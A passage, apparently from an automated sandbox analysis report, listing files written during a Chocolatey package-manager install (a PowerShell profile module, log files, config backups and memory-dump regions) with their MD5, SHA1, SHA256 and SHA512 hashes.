| SHA512 | 3bae1a9c7a7610ec86c5187de2ccffd295bd0d054a86000fe76a5d375842b98806a6d4f227dda5b0ab289b6365d664a2c3e55891add3e5cdc22efb75a410894e |
C:\Windows\Temp\chocolatey\chocoInstall\tools\chocolateyInstall\helpers\chocolateyProfile.psm1
| MD5 | 2d821e986cc3d5baed2b35fd7c98291c |
| SHA1 | 6838f726ef41a3fef1878af6e1b5d88dfc148ae2 |
| SHA256 | 91b8605fafba35d44f4352aa96f8d8fb366d0970e68bd194326f80eca67bf6d3 |
| SHA512 | 37695fe351a5ee1c7326f77f653a49cad9c9a3a2dce3f3761d2baaece77f927691ac47a81ba8d0ac2f89c868d72f0e9751ab0f78375dcec936566c6c87297d1a |
C:\ProgramData\chocolatey\logs\chocolatey.log
| MD5 | 52425ee6979f86a819f4f614b8addb7f |
| SHA1 | 61ba91afb4e81512d46df0c3d8c27c4ee860b4aa |
| SHA256 | 3cbba77e22d2d30d057546df486c872015a7fdc270d3ffc75c6d37a3e960f926 |
| SHA512 | 13a280d4f893070c43984f2468d65bff16cd72cf2dc44780c4be8eb20df35622c0c07f031f3ffc77820cdc648f7a17487d23102af2806bd80320d58bb976d84c |
memory/1064-3263-0x0000029DDFC20000-0x0000029DDFC70000-memory.dmp
C:\ProgramData\chocolatey\logs\chocolatey.log
| MD5 | 8793074b26a0b54dd18792dc6e235bfe |
| SHA1 | 4370bc34dc976c3a065f1438acb611efb9c02b52 |
| SHA256 | cd66b44072cfe06535717c040f6aa35b60e169a7b231fe2d6f9cc8fcb08676c9 |
| SHA512 | 1450a2ee4a1b762456819e1dfecb86db801748dccd6f099308591c0b841a39c68a38b2a30523160223686b55422fdf336f44ec5eecdd6e54ab8583491afb99fd |
memory/1064-3300-0x0000029DDF230000-0x0000029DDF24E000-memory.dmp
C:\ProgramData\chocolatey\config\chocolatey.config.backup
| MD5 | 8b6737800745d3b99886d013b3392ac3 |
| SHA1 | bb94da3f294922d9e8d31879f2d145586a182e19 |
| SHA256 | 86f10504ca147d13a157944f926141fe164a89fa8a71847458bda7102abb6594 |
| SHA512 | 654dda9b645b4900ac6e5bb226494921194dab7de71d75806f645d9b94ed820055914073ef9a5407e468089c0b2ee4d021f03c2ea61e73889b553895e79713df |
C:\ProgramData\chocolatey\config\chocolatey.config.1064.update
| MD5 | a3f016f5f2bd742ff1591950260f6f75 |
| SHA1 | 7feabbcc2e2d51c09065071f58da23990e215b72 |
| SHA256 | 6621f97fca4589b04e4c9a835344371fc3ecdf1f4cdac5c1492c05fcc23629f3 |
| SHA512 | ad6a96131221f3e8ac1e5bfc094ae1c09344a65f84b73d6933650e26417a569275e049b564b4c954641c7906a5fbbc886e37fa4a4bfb8216ccf3b519d09c7250 |